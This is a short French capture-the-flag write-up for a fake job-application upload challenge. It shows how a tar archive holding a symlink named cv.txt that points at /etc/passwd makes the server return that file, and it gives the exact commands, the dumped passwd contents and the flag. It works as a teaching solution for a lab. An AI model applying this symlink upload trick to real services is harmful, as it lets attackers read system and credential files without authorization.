“Hello there,
We are looking for a developer or security consultant to secure our filebox system. We stumbled upon your LinkedIn profile and it seems like you would be a perfect candidate for this job. Could you please send us your CV and Motivation letter?
Thanks,
faceSec HR Director.”
Ce challenge permet, après s'être enregistrer, d'uploader des fichier .txt à la fois en terme de CV et de lettre de motivation. On peut également uploader un fichier .tar contenant un fichier cv.txt et un fichier motiv.txt
Ce chalenge rappel la vulnérabilité de Facebook du mois de décembre http://josipfranjkovic.blogspot.fr/2014/12/reading-local-files-from-facebooks.html néanmoins on doit uploader un fichier .tar et non un fichier .zip.
On créé donc un fichier cv.txt avec un lien symbolique vers /etc/passwd/ et un fichier motiv.txt avec du contenu « random ». On tar ces deux fichiers.
ln -s /etc/passwd cv.txt echo plop > motiv.txt tar cvf tar.tar *.txt cv.txt motiv.txt
On upload le fichier tar.tar et on récupère le fichier /etc/passwd/ :
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin facesec:x:1000:1000:W00tSymL1nkAttackStillW0rksIn2k15:/home/facesec:/bin/sh
Le flag est W00tSymL1nkAttackStillW0rksIn2k15.